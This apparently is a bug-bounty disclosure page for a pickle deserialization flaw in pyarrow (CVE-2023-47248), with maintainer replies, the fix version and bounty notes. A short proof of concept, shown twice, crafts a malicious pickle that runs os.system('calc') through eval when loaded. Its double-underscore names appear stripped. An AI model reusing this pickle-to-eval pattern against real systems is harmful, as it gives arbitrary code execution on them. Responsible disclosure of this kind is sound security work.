Apache arrow command execution vulnerability in apache/arrow

Valid

Reported on

Nov 2nd 2023


Apache arrow command execution vulnerability

vulnerability information

Apache Arrow is a multilingual toolkit designed to accelerate data exchange and memory processing. Apache Arrow is a development platform for memory analytics. It contains a range of technologies that enable large data systems to process and move data quickly. Project Address: https://github.com/apache/arrow When apache arrow sets the extension type, it is found that there is no verification of the transmitted content, which allows attackers to construct malicious content and implement arbitrary command execution.

Environment construction

Python 3.8 Windows11 Install Pyarrow first

pip install pyarrow

The details of the vulnerability

apache arrow When setting the extension type, it was found that there was no validation for the content of the transmission This test is carried out under windows11, and malicious data is constructed. After loading, arbitrary command execution can be realized, and the calculator will pop up.

Execute script, pop up calculator

POC: import pickle

class A(): def reduce(self): return eval, ("import('os').system('calc')",)

x = [A()] f = open("evil.pkl","wb") pickle.dump(x,f) f.close()

import pyarrow as pa with open("evil.pkl","rb") as d: pa.PyExtensionType.arrow_ext_deserialize(None,d.read())

Impact

yes

Occurrences

Apache arrow command execution vulnerability

vulnerability information

Apache Arrow is a multilingual toolkit designed to accelerate data exchange and memory processing. Apache Arrow is a development platform for memory analytics. It contains a range of technologies that enable large data systems to process and move data quickly. Project Address: https://github.com/apache/arrow When apache arrow sets the extension type, it is found that there is no verification of the transmitted content, which allows attackers to construct malicious content and implement arbitrary command execution.

Environment construction

Python 3.8 Windows11 Install Pyarrow first

pip install pyarrow

The details of the vulnerability

apache arrow When setting the extension type, it was found that there was no validation for the content of the transmission This test is carried out under windows11, and malicious data is constructed. After loading, arbitrary command execution can be realized, and the calculator will pop up.

Execute script, pop up calculator

POC: import pickle

class A(): def reduce(self): return eval, ("import('os').system('calc')",)

x = [A()] f = open("evil.pkl","wb") pickle.dump(x,f) f.close()

import pyarrow as pa with open("evil.pkl","rb") as d: pa.PyExtensionType.arrow_ext_deserialize(None,d.read())

References

We are processing your report and will contact the apache/arrow team within 24 hours. 4 months ago
We have contacted a member of the apache/arrow team and are waiting to hear back 4 months ago
apache/arrow maintainer has acknowledged this report 4 months ago
ASF
4 months ago

Maintainer


Thank you for responsibly disclosing this potential issue!

While indeed this PoC shows passing untrusted data to __arrow_ext_deserialize__ is dangerous, __arrow_ext_deserialize__ is not public API. In order to qualify as a vulnerability, you'll need to show a code path where untrusted data is passed to this function. Did you identify any such code paths?

ASF
4 months ago

Maintainer


We did find a potential issue in this area, and may issue a CVE. If we end up crediting you, how would you like to be credited?

heishou
3 months ago

Researcher


Dear researcher, I hope you can help me apply for cve number, if possible, I hope to give me appropriate reward to encourage me to continue safe research. Li Jiakun-laoquanshi

ASF
3 months ago

Maintainer


We confirm this issue, and have fixed it in version 14.0.1 . We have published CVE-2023-47248 for it and credited you according to your directions above. Thanks again for reporting this issue responsibly!

ASF Security Team modified the Severity from Critical (10) to High (7.5) 3 months ago
ASF Security Team modified the CWE from Improper Neutralization of Special Elements used in a Command ('Command Injection') to Insufficiently Protected Credentials 3 months ago
heishou
3 months ago

Researcher


Hello dear safety researcher, when can I claim my reward?

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
Ben Harvie validated this vulnerability 3 months ago
laoquanshi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 3 months ago
to join this conversation